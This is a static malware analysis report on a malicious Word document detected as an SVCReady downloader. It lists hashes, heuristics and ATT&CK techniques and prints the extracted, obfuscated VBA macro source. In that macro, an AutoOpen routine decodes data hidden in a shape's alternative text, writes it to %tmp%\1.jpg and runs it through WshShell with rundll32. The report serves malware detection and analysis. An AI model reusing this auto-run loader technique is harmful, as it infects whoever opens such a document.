Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2b1824e5094baf87…

MALICIOUS

Office (OOXML)

115.0 KB Created: 2020-07-23 09:19:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-07
MD5: d8e66375f8e18ce115eab41304386905 SHA-1: 92c5f7a1a6ef2078adff2bd32e732ffa6ac465ee SHA-256: 2b1824e5094baf87ef08e0ea1282d9beba28ab9b57b049fb041926ce51c045fa
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious OOXML document containing a VBA macro with an AutoOpen subroutine. This macro is designed to download and execute a second-stage payload. Specifically, it constructs a temporary file path using Environ("tmp") and appends \1.jpg, and then uses a WshShell object to execute this file. The presence of the AutoOpen macro and the execution of a shell command strongly indicate a downloader functionality.

Heuristics 7

  • ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
    • http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
    • http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4753 bytes
SHA-256: cff8d277269f83582cce764314063bbdde2d0eca697d5b9bad1c22962a4e30a5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "f4122464"
Function a37c01d3()
a37c01d3 = ActiveWindow.Top
End Function
Function ff5296ec()
ff5296ec = ActiveWindow.UsableHeight
End Function
Function ec6612b7()
ec6612b7 = "Serialising specialisations wolves"
End Function
Function e35b3611()
e35b3611 = ActiveWindow.DisplayRulers
End Function
Sub AutoOpen()
Dim e923f7a7 As New c8fd538c
aaa = c551f3c1(c0e34d72)
c412083b = e923f7a7.c45a5649(aaa, "")
f40953eb a97b5d2d, c412083b
Dim f9026acd As New WshShell
Call f9026acd.exec(b06c540c & " " & a97b5d2d)
End Sub

Attribute VB_Name = "b8d38590"
Function b39b4609()
b39b4609 = 7931.5760111907
End Function
Function f2dd2e27()
f2dd2e27 = ActiveWindow.Creator
End Function
Function f0677370()
f0677370 = ActiveWindow.Hwnd
End Function
Function cdbbb5f2()
cdbbb5f2 = ActiveWindow.DisplayRulers
End Function
Sub f40953eb(e4d78e01, a8aa1959)
Dim f65d6160
f65d6160 = FreeFile
Open e4d78e01 For Output As #f65d6160
Print #f65d6160, ee54efd4(a8aa1959)
Close #f65d6160
End Sub
Function a97b5d2d()
a97b5d2d = Environ("tmp") & "\1.jpg"
End Function
Function e4f695a7()
e4f695a7 = ActiveWindow.Width
End Function
Function dc7e4c7f() As Long
Dim ed20f0ef As Long
Dim f918f8a9 As Integer
f918f8a9 = 137
For ed20f0ef = 17 To 76
f918f8a9 = f918f8a9 + ed20f0ef
Next ed20f0ef
dc7e4c7f = f918f8a9
End Function
Function e6317aed()
e6317aed = Application.ActiveDocument.ActiveWindow
End Function
Function dc60458d()
dc60458d = Application.ActiveDocument.AutoFormatOverride
End Function
Function c551f3c1(a821f521)
For b72736e8 = 1 To Len(a821f521) Step 3
df89acbe = df89acbe & Mid(a821f521, b72736e8, 1)
Next
c551f3c1 = df89acbe
End Function
Function a5aaa862()
a5aaa862 = 2409.1464251482
End Function
Function ae58179a()
ae58179a = ActiveWindow.Document
End Function
Function c8aa73a9()
c8aa73a9 = 45
End Function
Function eaf39900() As Long
Dim a989973b As Integer
Dim c2d37e28 As Integer
c2d37e28 = 142
For a989973b = 44 To 76
c2d37e28 = c2d37e28 - a989973b
Next a989973b
eaf39900 = c2d37e28
End Function
Sub ca0a7d97()
End Sub
Function a6f695c2()
a6f695c2 = Application.ActiveDocument.ActiveTheme
End Function
Function d2bc24a9()
d2bc24a9 = ActiveWindow.StyleAreaWidth
End Function
Function cbb191f7()
cbb191f7 = Application.ActiveDocument.CompatibilityMode
End Function
Function d5da7ebf()
d5da7ebf = 195
End Function
Function ee54efd4(a8aa1959)
ee54efd4 = StrConv(a8aa1959, 64)
End Function
Function d09ee6da()
d09ee6da = ActiveWindow.WindowState
End Function
Function a283e88a()
a283e88a = ActiveWindow.DisplayVerticalScrollBar
End Function
Function ae2bc834()
ae2bc834 = Application.ActiveDocument.AttachedTemplate
End Function
Function a290c0e3()
a290c0e3 = ActiveWindow.View
End Function
Function c0e34d72()
c0e34d72 = ActiveDocument.Shapes(1).AlternativeText
End Function
Function b6ca3442()
b6ca3442 = ActiveWindow.Visible
End Function
Function eee5fbd9()
eee5fbd9 = ActiveWindow.WindowNumber
End Function
Function af3992b1()
af3992b1 = True
End Function
Function f952e807()
f952e807 = Application.ActiveDocument.CurrentRsid
End Function
Function b06c540c()
b06c540c = c551f3c1("r0aed4g4fsbav2brb13022dd")
End Function

Attribute VB_Name = "c8fd538c"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function e355dfdc()
e355dfdc = ActiveWindow.Visible
End Function
Function fd239f34(bb0c81fanp As String) As Boolean
If 250 - 41 <> Len(bb0c81fanp) Then
fd239f34 = True
End If
End Function
Function ac04ca2d()
ac04ca2d = -2112360254
End 
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 28672 bytes
SHA-256: 4ceb2d948ae48b79a66d1041a1d429d109adaa1cb03c0de2df2da5e2bc0d6095

Open this report in the interactive analyzer, or submit your own file for analysis.